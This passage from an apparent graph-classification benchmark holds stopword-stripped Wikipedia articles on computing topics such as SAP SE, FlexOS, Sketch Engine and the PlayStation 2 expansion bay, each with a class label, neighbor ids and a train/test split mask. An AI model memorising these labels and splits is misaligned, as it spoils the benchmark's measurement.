naming fs-cache cachefs terminology confusing outsiders cachefs backend fs-cache handles actual data storage retrieval fs-cache passes requests netfs cachefs cache facility/layer cache backends like cachefs nfs afs cachefs filesystem fs-cache facility block device used cache simply mounting needs special activation deactivated unmounting daemon using existing filesystem ext3 user_xattr cache cache bound cachefilesd -s project status seems stalled people attempting revive code bring date facility conceptualised following diagram facility known fs-cache designed transparent possible user system applications able use nfs files normal without knowledge cache outdated articles",
    "neighbors": [
      9665,
      9762,
      2314,
      823,
      11501,
      11568,
      3826,
      5397,
      2199,
      8379,
      5471
    ],
    "mask": "None"
  },
  {
    "node_id": 5207,
    "label": 2,
    "text": "Christoph_Junghans:christoph junghans christoph junghans german computational physicist academic working multiscale modeling computational co-design currently deputy group leader applied computer science group los alamos national laboratory born merseburg educated leipzig university johannes gutenberg university mainz phd 2010 graduate studies also worked forschungszentrum jülich ibm systems technology group junghans joined los alamos national laboratory 2011 postdoc theoretical division became staff member applied computer science group 2014 junghans one authors votca package contributor many open-sources projects including gromacs gentoo linux",
    "neighbors": [
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 5208,
    "label": 1,
    "text": "Titan_traffic_database:titan traffic database titan traffic database database allegedly use swedish signals intelligence agency national defence radio establishment fra according news report rapport svt june 2008 based account anonymous source source alleged agency storing massive amounts information talking content leading private citizen lodging complaint police ultimately prosecutor launch full-scale investigation deemed illegal time",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 5209,
    "label": 1,
    "text": "ALTIBASE_HDB:altibase hdb altibase hybrid database relational open source database management system manufactured altibase corporation software comes hybrid architecture allows access memory-resident disk-resident tables using single interface supports synchronous asynchronous replication offers real-time acid compliance support also offered variety sql standards programming languages important capabilities include data import export data encryption security multiple data access command sets materialized view temporary tables others altibase so-called hybrid dbms meaning simultaneously supports access memory-resident disk-resident tables via single interface compatible solaris hp-ux aix linux windows supports complete sql standard features multiversion concurrency control mvcc implements fuzzy ping-pong checkpointing periodically backing memory-resident data ships replication database link functionality altibase acquired in-memory database engine electronics telecommunications research institute february 2000 commercialized database october year 2001 altibase changed name in-memory database product spiner altibase 2001 2004 altibase integrated in-memory database disk-resident database create hybrid dbms released version 4.0 renamed altibase hdb altibase released version 5.5.1 6.1.1 2012 version 6.3.1 november 2013 6.5.1 may 2015 altibase claims world first hybrid dbms altibase hdb includes following application development interfaces",
    "neighbors": [
      8644,
      8582,
      4781,
      6797,
      7983,
      10413,
      3219,
      3573,
      823,
      1304
    ],
    "mask": "None"
  },
  {
    "node_id": 5210,
    "label": 7,
    "text": "SAP_SE:sap se sap se systems applications products data processing german multinational software corporation makes enterprise software manage business operations customer relations sap headquartered walldorf baden-württemberg germany regional offices 180 countries company 425,000 customers 180 countries component euro stoxx 50 stock market index xerox exited computer hardware manufacturing industry 1971 asked ibm migrate business systems ibm technology part ibm compensation migration ibm given rights scientific data systems sds /sape software reportedly contract credit 80,000 five ibm engineers ai department dietmar hopp klaus tschira hans-werner hector hasso plattner claus wellenreuther mannheim baden-württemberg working enterprise-wide system based software told would longer necessary rather abandoning project decided leave ibm tech start another company june 1972 founded sap system analysis program development sapd company private partnership german civil code first client german branch imperial chemical industries östringen developed mainframe programs payroll accounting instead storing data punch cards mechanically ibm stored locally electronic system using common logical database activities organization therefore called software real-time system since need process punch cards overnight reason flagship product carried r name late 1990s first version also standalone software could offered interested parties 1973 first commercial product launched sap completes first financial accounting system rf system serves cornerstone ongoing development software modules system eventually bear name sap r/1 offered common system multiple tasks permitted use centralized data storage improving maintenance data technical point view therefore database necessary 1976 sap gmbh systeme anwendungen und produkte der datenverarbeitung systems applications products data processing founded sales support subsidiary five years later private partnership dissolved rights passed sap gmbh headquarters moved following year walldorf germany three years later 1979 sap launched sap r/2 expanding capabilities system areas material management production planning 1981 sap brought re-designed product market however sap r/2 improve period 1985 1990 sap released new sap r/3 1992 sap developed released several versions r/3 1995 mid-1990s sap followed trend mainframe computing client/server architectures development sap internet strategy mysap.com redesigned concept business processes integration via internet result r/3 replaced introduction sap erp central component ecc 5.0 2004 architectural changes also made support enterprise service architecture transition customers services-oriented architecture latest version sap erp 6.0 released 2006 sap erp 6.0 since updated sap enhancement packs recent sap enhancement package 8 sap erp 6.0 2016 august 1988 sap gmbh became sap ag public trading started 4 november 1988 shares listed frankfurt stuttgart stock exchanges 1995 sap included german stock index dax 22 september 2003 sap included stoxx europe 50 company official name became sap ag public limited company 2005 annual general meeting 2014 sap changed ag european company societas europaea se since 2012 sap acquired several companies sell cloud-based products several multibillion-dollar acquisitions seen analysts attempt challenge competitor oracle 2014 sap bought concur technologies provider cloud-based travel expense management software 8.3 billion sap expensive purchase date analysts reactions purchase mixed thomas becker commerzbank questioning whether concur right choice sap credit suisse called acquisition aggressive move 2014 ibm sap began partnership sell cloud-based services likewise 2015 sap also partnered hpe provide secure hybrid cloud-based services running sap platform hpe ibm provide infrastructure services sap sap runs sap hana cloud solution top sap announced additional partnerships microsoft order give customers tools data visualization well improved mobile applications sap exceeded revenue projections due expansion cloud business success sap hana growth also partially attributed acquisitions concur fieldglass company announced plans 2016 invest heavily technology relating internet things iot part strategy capitalize growth market purpose €2 billion planned investment relevant sectors end 2020 sap also launch new product line called sap iot combine large amounts data things connected internet machine learning sap real-time database s/4 hana 2015 company launched sap s/4hana newest generation sap business suite written natively sap hana platform offers cloud on-premises hybrid deployment options customers benefits including smaller data footprint higher throughput faster analytics faster access data also allows existing sap business suite customers upgrade product sap business suite 2016 sap introduced sap hana express edition meant run personal computers cloud computing platforms students small-scale developers january 29 2019 sap announced plans cut approximately 4,000 positions company strategic plan shift modern cloud-based technologies blockchain quantum computing machine learning internet things artificial intelligence fiscal year 2017 sap reported earnings eur€4 billion annual revenue eur€23.5 billion increase 6.3 previous fiscal cycle sap shares traded usd105 per share market capitalization valued usd128 billion december 2018 makes sap valuable company germany sap world third largest software programming company corporation operates europe asia africa middle east north america south america sap focuses 25 industries six industry sectors process industries discrete industries consumer industries service industries financial services public services offers integrated product sets large enterprises mid-sized companies small businesses service-oriented architecture incorporated sap erp enterprise resource planning system products defined within sap enterprise services architecture enterprise soa sap enterprise service oriented architecture enterprise soa sap se service-oriented architecture implementation enterprise soa enabled sap netweaver platform builds benefits web services sap positioned enterprise soa deliver benefits offered service-oriented architecture including enabling flexibility business efficiency sap markets enterprise soa cost-effective way adding new applications existing infrastructure sap solutions currently use enterprise soa mysap crm mysap erp mysap srm sap partners include global services partners cross-industry multinational consulting capabilities global software partners providing integrated products complement sap business suite solutions global technology partners providing user companies wide range products support sap technology including vendors hardware database storage systems networks mobile computing technology extensions partners companies provide functionality complements sap product capabilities products certified sold supported sap partner companies include adobe ca technologies gk software hewlett-packard ids scheer mendix opentext knoa software backoffice associates sap also partnered apple work mobile experience sap enterprise customers part partnership new sap hana cloud platform sdk would delivered exclusively ios result developers build applications based sap hana cloud platform iphone ipad devices partnership announced may 2016 sap products small businesses midsize companies delivered global partner network sap partneredge programme sap partner programme offers set business enablement resources program benefits help partners including value-added resellers vars independent software vendors isvs profitable successful implementing selling marketing developing delivering sap products broad range customers sap community network scn community sap customers partners employees influencers – typically roles developers consultants integrators business analysts – gain share knowledge abap java .net soa technologies plus analytics dashboards business process best practices cloud mobile big data range topics via blogs discussion forums downloads code samples training materials technical library sap uses two-tier structure boards executive board supervisory board 2016 members executive board bill mcdermott ceo chairman joined 2008 robert enslin 2014 bernd leukert 2014 luka mucic cfo 2014 michael kleinemeier 2015 stefan ries 2016 steve singh 2016 gerhard oswald 1996 juergen mueller join executive board 2019 functional units sap split across different organizational units r needs field activities customer support sap labs mainly responsible product development whereas field organizations spread across country responsible field activities sales marketing consulting headquarters responsible overall management well core engineering activities related product development worldwide customer support provided field organizations unified organization called active global support ags sap labs r locations develop improve sap core products sap labs strategically located high-tech clusters around globe four prominent labs sap se located germany india china us labs walldorf founded 1972 became sap primary location beginning focus sap expansion entering highly developed markets 1993 palo alto became part sap labs aiming acquire talented employees sap opened another lab bangalore 2003 among latest sap labs labs czech republic slovakia poland three labs established 2016 labs india largest labs outside germany order manage sap labs sap labs network sln created sln global unit manages regional labs shares best business practices coordinates distributes development projects among individual sap labs locations accelerates product delivery gives sap full access talent drives sap corporate strategy regarding innovation business growth sap user groups independent nonprofit organizations sap customers sap partners serve communications channel members towards sap sap towards markets americas sap users group asug company largest user group 100,000 individuals 3,800 companies asug members professionals work 17 industries many technical business process experts sap ecosystem varied levels experience come small businesses global corporations well universities 2007 sap user group executive network sugen established sap provoked controversy frustration among users 2008 raising cost maintenance contracts issue subject intense discussion among user groups sap cloud platform sap platform-as-a-service paas used deliver in-memory capabilities microservices building extending mobile-enabled cloud applications infrastructure offered global network sap managed data centers sap cloud platform open platform-as-a-service includes in-memory sap hana database management system connects premises cloud-based systems running sap third-party software relies open standards like java javascript node.js cloud foundry integration options sap cloud platform promoted build extend business applications rapid innovation cycles sap apple inc. partnered develop mobile applications ios using cloud-based software development kits sdks sap cloud platform sap founding development partners cloud platform include accenture celonis enterprisealumni walmart sap cloud platform based open source technology developed supported partnership suse company also partnership cloud foundry beta offering sap cloud platform enables customers test give feedback functionalities coming cloud foundry sap launched sap store march 2015 principal e-commerce property allow customers buy products directly web rather traditional sales channels customers purchase free trials starter editions pay credit card paypal launched 2016 sap app center online application marketplace third-party applications integrate extend sap products applications available free well via yearly monthly subscription models applications available range integrations content management software mobile approval management payment platforms july 2018 features 1,500 applications sap two annual conferences sap competitors primarily enterprise resource planning software industry field oracle corporation sap major competitor sap also competes customer relationship management marketing sales software manufacturing warehousing industrial software supply chain management logistics software sectors oracle corporation filed lawsuit sap malpractice unfair competition california courts 2007 sap lost case 2010 ordered pay 1.3 billion cited largest copyright infringement judgment history verdict overturned 2011 lawsuit finally settled 2014 356.7 million resulting pressure saw sap sugen sap user group executive network agree major benchmarking exercise prove value new support pricing policy customers december 2009 sap delayed enterprise support price rises agreement reached benchmarks kpis key performance indicators january 2010 sap reversed direction enterprise support reintroduced standard support package customers move reinstate standard support – 18 percent annual license fees enable customers choose option best meets requirements company said august 2013 sap acquired german software company hybris ecommerce capabilities sap donated several millions dollars variety global health causes including product red campaign global fund addition sap distributed free software south africa part effort towards developing future markets company also encourages employees volunteer social sabbaticals sending teams people different countries aid non-profits sap employees volunteered china india brazil south africa sap arena opened mannheim 2005 home adler mannheim ice hockey team rhein-neckar löwen handball team since 2013 company name sponsor sap center san jose california team also sponsors formula one racing team mclaren nfl teams new york giants new york jets city football group esports squad team liquid sap ambassadors include german tennis player angelique kerber german eventing rider ingrid klimke south african golfers ernie els gary player branden grace sap also engages outreach activities within company 2013 company launched initiative hire employees autism asperger syndrome citing undervalued ability contribute workforce sap aims compose 1 workforce individuals autism year 2020 february 2019 sap accused ‘ improper conduct ’ linked state contracts kenya tanzania anonymous whistle-blower claims firm attorneys sap used twenty third century systems ttcs bribe officials tanzania ports authority tpa win us 6.6-million enterprise resource planning software tender involved provision software licenses services july 2017 allegations made sap involved business transactions controversial politically influential gupta family south africa sap accused paying cad house gupta-controlled company r100 million order secure transnet deal sap denied allegations claiming money paid extension sales force despite cad house prior sap experience guptas dealings sap revealed widely publicized e-mail leak consequence allegations sap launched investigation led four south african managers placed administrative leave along seizure mobile phones computers claas kuehnemann named acting managing director africa investigation continued 26 october 2017 sap announced voluntarily reported u.s. securities exchange commission possible violation us law including foreign corrupt practices act related south african bribery allegations sap investigation conducted law firm baker mckenzie revealed sap paid 7.7 million commissions third-parties linked gupta family securing contracts worth 48 million transnet eskom may 2015 sap agreed pay 3.9 million settle u.s. securities exchange commission civil charges former executive scheme bribe panama government officials order win lucrative technology contracts",
    "neighbors": [
      11136,
      6018,
      6539,
      9732,
      9988,
      5384,
      6153,
      4234,
      4107,
      4236,
      4363,
      270,
      1423,
      5258,
      17,
      530,
      1041,
      6284,
      9360,
      10386,
      10389,
      10511,
      10396,
      9629,
      9248,
      2338,
      2596,
      10020,
      11687,
      7721,
      10236,
      4781,
      10413,
      8751,
      5173,
      3894,
      10553,
      1856,
      2496,
      579,
      2501,
      9286,
      1224,
      724,
      2901,
      3414,
      5460,
      6356,
      9305,
      5210,
      9569,
      3042,
      4194,
      9828,
      4197,
      1638,
      10340,
      3560,
      3951,
      3568,
      7412,
      6522,
      3323,
      4604,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 5211,
    "label": 2,
    "text": "Nokia_Eseries:nokia eseries nokia eseries consists business-oriented smartphones running symbian os emphasis enhanced connectivity support corporate e-mail push services well enterprise-styled products many featuring qwerty keyboards devices advanced office features s60 platform phones equipped wireless lan also provide voip client sip protocol throughout series lifetime main competitors blackberry products research motion eseries marketed 2011 october 12 2005 mobile phone manufacturer nokia announced company refers eseries consisting three mobile phones nokia e60 nokia e61 nokia e70 may 18 2006 nokia announced addition e50 series refers business device rather smartphone february 12 2007 nokia announced addition three new devices series e61i e65 e90 april 11 2008 nokia australia advised e61i discontinued may 2008 replaced featured smaller e71 later releases included e72 e52 e5 last eseries device nokia e6 2011",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      4365,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      10271,
      2208,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5212,
    "label": 1,
    "text": "Corpus_manager:corpus manager corpus manager corpus browser corpus query system tool multilingual corpus analysis allows effective searching corpora corpus manager usually represents complex tool allows one perform searches language forms sequences may provide information context allow user search positional attributes lemma tag etc called concordances features include ability search collocations frequency statistics well metadata information processed text narrower meaning corpus manager refers server side corpus query engine whereas client side simply called user interface corpus manager software installed personal computer might provided web service",
    "neighbors": [
      6144,
      8440,
      5214
    ],
    "mask": "Train"
  },
  {
    "node_id": 5213,
    "label": 9,
    "text": "Higher-order_abstract_syntax:higher-order abstract syntax computer science higher-order abstract syntax abbreviated hoas technique representation abstract syntax trees languages variable binders abstract syntax tree abstract mathematical object certain structure nature instance first-order abstract syntax foas trees commonly used compilers tree structure implies subexpression relation meaning parentheses required disambiguate programs concrete syntax hoas exposes additional structure relationship variables binding sites foas representations variable typically represented identifier relation binding site use indicated using identifier hoas name variable use variable refers directly binding site number reasons technique useful first makes binding structure program explicit need explain operator precedence foas representation need rules binding scope hand interpret hoas representation second programs alpha-equivalent differing names bound variables identical representations hoas make equivalence checking efficient one mathematical object could used implement hoas graph variables associated binding sites via edges another popular way implement hoas example compilers de bruijn indices domain logical frameworks term higher-order abstract syntax usually used refer specific representation uses binders meta-language encode binding structure object language instance logical framework lf λ-construct arrow → type first-order encoding object language construct codice_1 would using twelf syntax codice_2 family object language expressions family codice_3 representation variables implemented perhaps natural numbers shown constant codice_4 witnesses fact variables expressions constant codice_1 expression takes three arguments expression bound variable bound another expression variable bound within canonical hoas representation object language would representation object level variables appear explicitly constant codice_1 takes expression bound meta-level function codice_2 → codice_2 body let function higher-order part expression free variable represented expression holes filled meta-level function applied concrete example would construct object level expression assuming natural constructors numbers addition using hoas signature codice_9 twelf syntax function formula_1 specific representation advantages beyond ones one reusing meta-level notion binding encoding enjoys properties type-preserving substitution without need define/prove way using hoas drastically reduce amount boilerplate code binding encoding higher-order abstract syntax generally applicable object language variables understood variables mathematical sense stand-ins arbitrary members domain often always case instance advantages gained hoas encoding dynamic scope appears dialects lisp dynamically scoped variables act like mathematical variables",
    "neighbors": [
      1952,
      6753,
      3554,
      10510,
      6070,
      10011,
      5885,
      4670
    ],
    "mask": "Train"
  },
  {
    "node_id": 5214,
    "label": 1,
    "text": "Sketch_Engine:sketch engine sketch engine corpus manager text analysis software developed lexical computing limited since 2003 purpose enable people studying language behaviour lexicographers researchers corpus linguistics translators language learners search large text collections according complex linguistically motivated queries sketch engine gained name one key features word sketches one-page automatic corpus-derived summaries word grammatical collocational behaviour currently supports provides corpora 90+ languages sketch engine product lexical computing limited company founded 2003 lexicographer research scientist adam kilgarriff started collaboration pavel rychlý computer scientist working natural language processing centre masaryk university developer manatee bonito two major parts software suite introduced concept word sketches since sketch engine commercial software however core features manatee bonito developed 2003 extended since freely available gpl license within nosketch engine suite sketch engine consists three main components underlying database management system called manatee web interface search front-end called bonito web interface corpus building management called corpus architect manatee database management system specifically devised effective indexing large text corpora based idea inverted indexing keeping index positions given word text used index text corpora comprising tens billions words searching corpora indexed manatee performed formulating queries corpus query language cql manatee written c++ offers api number programming languages including python java perl ruby recently rewritten go faster processing corpus queries bonito web interface manatee providing access corpus search client–server model manatee server bonito plays client part written python corpus architect web interface providing corpus building management features also written python sketch engine used major british publishing houses producing dictionaries macmillan english dictionary dictionnaires le robert oxford university press shogakukan four uk ’ five biggest dictionary publishers use sketch engine",
    "neighbors": [
      5380,
      3462,
      8582,
      3721,
      5903,
      1044,
      1435,
      9245,
      5667,
      5677,
      2222,
      7983,
      10160,
      823,
      9552,
      11348,
      5212,
      7134,
      9577,
      8554,
      4971,
      113,
      4468
    ],
    "mask": "Test"
  },
  {
    "node_id": 5215,
    "label": 3,
    "text": "PlayStation_2_Expansion_Bay:playstation 2 expansion bay playstation 2 expansion bay 3.5 drive bay introduced model 30000 50000 playstation 2 replacing pcmcia slot used models 10000 15000 18000 longer present model 70000 designed network adaptor internal hard disk drive hdd peripherals enhance capabilities ps2 allow online play features shown e3 2001 network adaptor released together launch playstation 2 network play service two models adapter available one dial-up modem ethernet jack broadband internet connection sold north america one ethernet interface sold europe regions start-up disc network access disc included network adaptor installs file memory card connection settings accessible one network adaptor compatible game tony hawk pro skater 3 released november 2001 supported network adaptor hardware software finalized much later network adaptor also provides parallel ata interface molex disk drive power connector allow installation 3.5 ide hard disk drive expansion bay two disk connectors separate circuit boards main network adapter one third party connector replacements including sata connector sata ide converter available slimline playstation 2 models ethernet port built-in official hard disk drive interface however first slimline model scph-70000 complete network adapter onboard including analog modem earliest north american models may modified add external ide connector board scph-75000 series onwards ethernet functionality integrated i/o processor completely internally redesigned completely removing disk interface maximum supported rate 100mbit/s full duplex also backwards compatible 10mbit/s hardware configurations playstation 2 hard disk drive ps2 hdd released july 19 2001 japan together network adaptor march 23 2004 north america requires network adaptor connect playstation 2 receive power hdd 40 gb capacity used games reduce load time putting data hard drive temporarily back memory card data due magicgate copyright protection programs bootable directly hdd e.g playstation broadband navigator playonline viewer pop n music puzzle-dama online keyed system system installs hdd transferred another playstation 2 system files hdd accessed specific programs booted without reinstalled contrary popular belief complete reformat hdd necessary upon transfer hdd consoles else would useful hdd preformatted preinstalled software case north american hdd unit hdd utility disc included allow maintenance hdd including defragmentation disk repair formatting utilities along file manager browser north america final fantasy xi also included 35 north american games support hdd unofficial software called hd loader later also hd advance open playstation loader allow users copy entire games hdd run without discs also allow using standard consumer hard drives ps2 however compatible software expecting standard ps2 hard drive software combined hard drive allows one play games without using original disc desirable protects fragile perhaps rare game discs harm cases may improve performance however practice without controversy hdloader bypasses usual copy protection mechanisms built console allowing piracy linux kit playstation 2 released 2002 included playstation 2 linux software keyboard mouse vga adapter requires rgb monitor sync-on-green network adaptor ethernet 40 gb hard disk drive allows playstation 2 used personal computer mid 2010 possible install use playstation bb navigator ps-bbn hdd-osd hdd utility-disc every playstation 2 console every region achieved use special patched files hdd-osd ps-bbn modified version ulaunch well known piece playstation 2 homebrew software called hacked-ule also possible install homebrew software hdd make launchable hdd-osd ps-bbn game-channel like official hdd game however installing homebrew software hdd still requires much work hex-editor ps-bbn also fully translated given language translation process involves use beta-linux release playstation 2 specially compiled kernel gives access apa-reiserfs partitions 2013 games use hdd install data decrease load time and/or save/load instead using memory card used playstation 2 console region hdd using hex-editor atadpatcher v0.02 type booting software esr well known piece homebrew software ps2 patched copy hdd-osd and/or playstation bb navigator ps-bbn used users see data currently installed way official sony 40 gb hdd scph-20401",
    "neighbors": [
      1091,
      9512,
      10316,
      6799,
      5974,
      823,
      6873,
      10203,
      6845,
      1599
    ],
    "mask": "None"
  },
  {
    "node_id": 5216,
    "label": 4,
    "text": "Ashkan_Soltani:ashkan soltani ashkan soltani chief technologist federal trade commission previously independent privacy security researcher based washington dc 2010 2011 worked us federal trade commission staff technologist division privacy identity protection assisted investigations google facebook also worked primary technical consultant wall street journal know series investigating online privacy 2011 testified two different hearings held us senate committees focused privacy related matters julia angwin 2014 book dragnet nation describes soltani 'the leading technical expert ad tracking technology part team washington post shared 2014 pulitzer prize public service guardian us earned 2014 gerald loeb award large newspapers coverage disclosures surveillance done us national security agency soltani first high-profile research project 2009 study supported national science foundation team research ubiquitous secure computing documenting use zombie flash cookies several online advertising networks soltani colleagues berkeley revealed websites recreating tracking cookies consumers deleted storing unique tracking identifiers flash cookies automatically deleted consumers cleared browser cookies publication soltani research class action law firms filed suit several advertising networks websites quantcast clearspring videoegg collectively agreed pay total 3.4 million settle lawsuits 2011 soltani berkeley law professor chris hoofnagle published follow-up study documenting use web browser cache etags store persistent identifiers case flash cookies identifiers stored etags persisted even consumers deleted browser cookies etag tracking issue caught attention several members congress wrote federal trade commission september 2011 urged agency investigate use advanced tracking technologies potentially unfair deceptive business practice several companies performing etag based tracking identified research team subsequently sued class action lawyers january 2013 kissmetrics online advertising network settled etag related lawsuit 500,000",
    "neighbors": [
      7893,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 5217,
    "label": 4,
    "text": "Vera_Security:vera security vera data-centric security platform enables organizations effectively protect kind data policies rules governing access usage data regardless data resides travels vera enables global tracking auditing management data comprehensive security service saas platform vera also provides developers access downloadable software development kit sdk vera launched product april 2015 within first year operations announced partnerships dropbox okta centrify well strategic integrations box vmware microsoft office vera focuses sales marketing efforts large enterprises industries financial services manufacturing media entertainment technology sectors carlos delatorre serves chief executive officer since 2018 joining vera carlos led global sales organization mongodb world ’ fastest-growing database ecosystem first enterprise database company successfully ipo 26 years also served vice president sales clearslide inc. drove enterprise sales strategy business growth prior clearslide carlos served vice president sales dynamicops acquired vmware also held senior sales leadership roles bmc software bladelogic imlogic oblix company headquartered silicon valley secured venture financing notable investors including battery ventures sutter hill ventures capital one growth ventures vera nominated top 10 finalist innovation sandbox competition rsa conference 2016 crn magazine named vera “ 10 coolest security startups 2015 ” since vera additional awards vera privately funded company 31 million venture financing company announced 14 million series round november 2014 included hiring robin daniels cmo february 2016 vera announced 17 million series b round led sutter hill ventures participation existing investors battery ventures amplify partners private investors may 2016 capital one growth ventures joined company series b round financing founding ceo veritas software mark leslie joined vera board directors roger lee battery ventures stefan dyckerhoff sutter hill ventures also serve company board content storage agnostic platform vera capable securing type digital content anywhere ’ stored vera require end-users download proprietary agents plug-ins access secure data offers native integrations common file sharing enterprise platforms like box dropbox okta microsoft office 365 vera incorporates three primary components platform architecture secure cloud platform set end-user clients web-based administration dashboard vera dashboard gives end-users administrators full visibility control activity around content matter stored transmitted vera dashboard admin manage access controls set update policies oversee users activity run audit reports usage vera software development kit march 2016 vera announced sdk allows developers add encryption tracking policy enforcement access control custom legacy business applications vera sdk enables users programmatically execute following tasks device secure files unsecure files give access file specific users groups domains revoke access file specific users groups domains revoke access file users",
    "neighbors": [
      3880,
      6153,
      3629,
      4623,
      7899
    ],
    "mask": "Test"
  },
  {
    "node_id": 5218,
    "label": 0,
    "text": "Native-language_identification:native-language identification native-language identification nli task determining author native language l1 based writings second language l2 nli works identifying language-usage patterns common specific l1 groups applying knowledge predict native language previously unseen texts motivated part applications second-language acquisition language teaching forensic linguistics amongst others nli works assumption author l1 dispose towards particular language production patterns l2 influenced native language relates cross-linguistic influence cli key topic field second-language acquisition sla analyzes transfer effects l1 later learned languages using large-scale english data nli methods achieve 80 accuracy predicting native language texts written authors 11 different l1 backgrounds compared baseline 9 choosing randomly identification l1-specific features used study language transfer effects second-language acquisition useful developing pedagogical material teaching methods l1-specific instructions generating learner feedback tailored native language nli methods also applied forensic linguistics method performing authorship profiling order infer attributes author including linguistic background particularly useful situations text e.g anonymous letter key piece evidence investigation clues native language writer help investigators identifying source already attracted interest funding intelligence agencies natural language processing methods used extract identify language usage patterns common speakers l1-group done using language learner data usually learner corpus next machine learning applied train classifiers like support vector machines predicting l1 unseen texts range ensemble based systems also applied task shown improve performance single classifier systems various linguistic feature types applied task include syntactic features constituent parses grammatical dependencies part-of-speech tags surface level lexical features character word lemma n-grams also found quite useful task however seems character n-grams single best feature task building educational applications bea workshop naacl 2013 hosted inaugural nli shared task competition resulted 29 entries teams across globe 24 also published paper describing systems approaches",
    "neighbors": [
      7780,
      1044,
      8759
    ],
    "mask": "Test"
  },
  {
    "node_id": 5219,
    "label": 9,
    "text": "JavaScript_OSA:javascript osa javascript osa originally javascript osa abbreviated jsosa freeware inter-process communication scripting language macintosh computer javascript osa uses core language mozilla implementation javascript programming language see spidermonkey language used alternative applescript language use unrelated web browser-based scripting seen similar function microsoft jscript .net language windows machines although interoperability two languages system-level scripting language identical mozilla core language extensions added via core object macos object macos object methods obtaining objects bound applications done via appleevent messaging system part macintosh open scripting architecture language first released 2001 bundled late night software flagship product script debugger may 2005 new alpha version language made available testing improved second version language bundled version 4 script debugger javascript osa eventually discontinued due lack interest dropped script debugger 5 2012 os x yosemite introduced javascript automation jxa system-wide support scripting javascript built upon javascriptcore open scripting architecture features objective-c bridge enables entire cocoa applications programmed javascript",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      10507,
      8854,
      4378,
      8605,
      7455,
      3761,
      9780,
      11060,
      438,
      5311,
      7871,
      9152,
      8262,
      11087,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      482,
      7396,
      10470,
      487,
      5483,
      9195,
      8303,
      10991,
      10097,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5220,
    "label": 2,
    "text": "FlexOS:flexos flexos discontinued modular real-time multiuser multitasking operating system rtos designed computer-integrated manufacturing laboratory retail financial markets developed digital research flexible automation business unit monterey california since november 1986 marketed since january 1987 reengineered continuation digital research concurrent dos 286 multiuser multitasking operating system flexos designed frank holsworth like portable cp/m concurrent dos 286 concurrent dos 68k concurrent dos v60 flexos written c higher portability across hardware platforms featured low interrupt latency fast context switching supported popular ssl/tls libraries wolfssl original protected mode flexos 286 version 1.3 designed host machines equipped 286 cpus adaptations nec v60 nec v70 motorola 68000 processors planned flexos 286 executables using system native int dch int 220 application program interface filename extension .286 cp/m api front-end fe available well using extension .cmd executables filename extension .68k reserved flexos 68k file extension derived concurrent dos 68k 1986 may 1987 flexos version 1.31 released 80286 machines developer version required ibm pc/at-compatible machine 640 kb conventional 512 kb extended memory either monochrome cga ega graphics adapter flexos supported concept dynamically loadable unloadable subdrivers came driver prototypes floppies hard disks printers serial interfaces ram disks mice console drivers boot flex286.sys kernel would load resource managers device drivers specified config.sys binary file mixed similarly named config.sys configuration file dos shell command.286 would execute config.bat startup batch job instead common autoexec.bat flexos optional dos emulator provided limited pc dos 2.1 compatibility dos .com .exe programs certain restrictions applied since programs executed processor protected mode due bugs earlier steppings intel 80286 flexos 286 dos front-end required least 80286 e2 stepping function properly see loadall problems already caused delays delivery concurrent dos 286 earlier system optionally supported multitasking gem vdi graphical applications flexos 1.31 could linked none either two modules flexos 1.31 also supported flexnet june 1987 also versions 1.0 flexos 386 hosts flexos 186 remote cell controllers flexos 386 provided windowing feature offered pc dos 3.2 gem compatibility flexos 286 flexos 386 versions 2.0 registered 3 july 1989 among major flexos customers 1990/1991 fanuc ibm icl nixdorf siemens tec thorn emi software micrologic novell bought digital research july 1991 x/gem flexos release 1.0 a.k.a x/gem flexos 286 386 flexnet registered 21 december 1992 flexos used primary test platform new novell embedded systems technology nest novell decided abandon development various digital research operating systems multiuser dos successor concurrent dos novell dos successor dr dos sold flexos santa clara california-based integrated systems inc. isi july 1994 deal comprised direct payment half sum well shares representing 2 company company already psos+ another modular real-time multitasking operating system embedded systems continued maintain flexos well flexos version 2.33 current may 1998 flexos 2.34 released soon added support faster cpus 64 mb memory eide atapi cdrom drives integrated systems bought competitor wind river systems february 2000 owned intel since 2009 following list commands supported flexos known flexos versions include motorola 68000 freescale/nxp coldfire mcf5251 platform intel 80286 platform intel 80186/nec v20/v30 platform intel 80386 platform nec v60 platform named ibm 4680 os version 1 ibm originally chose dr concurrent dos 286 basis ibm 4680 computer ibm plant system products point-of-sale terminals 1986 last release ibm 4680 os version 4 replaced ibm 4690 version 1 versions july 1993 ibm announced adoption flexos version 2.32 basis ibm 4690 os version 1 pre-released 24 september 1993 generally made available 25 march 1994 flexos 2.32 supported 286 386 modes efficient memory management better console pipe systems brought overall quality performance improvements compared version came ibm 4680 os version 4 removed limits number applications running concurrently due efficient use kospool order support java ibm 4690 os version 2 brought support long filenames means virtual filesystem vfs architecture introduced fat32 volumes according year store ihl consulting group/ris news ibm 4690 os still market share 12 pos register/client market june 2005 ibm starting phase favour ibm retail environment suse ires ibm continue maintain 4690 os april 2015 recent version released ibm may 2012 ibm 4690 os version 6 release 3 meanwhile toshiba released toshiba 4690 os version 6 release 4 january 2014 siemens used still maintains flexos factory automation equipment well example s5 step-5 operating system s5-dos/mt based flexos 386 x/gem flexnet btrieve whereas smaller s5-dos system also present systems variant digital research personal cp/m-86 siemens industrial systems like coros ls-b/flexos coros os-b/flexos gracis/flexos os-525 flexos x/gem-based computers pc 16-20 pc 32 series available flexos well japanese post office shared terminals iii ctm iv based flexos",
    "neighbors": [
      6148,
      8729,
      10273,
      5677,
      573,
      6207,
      8262,
      2138,
      5220,
      7269,
      1126,
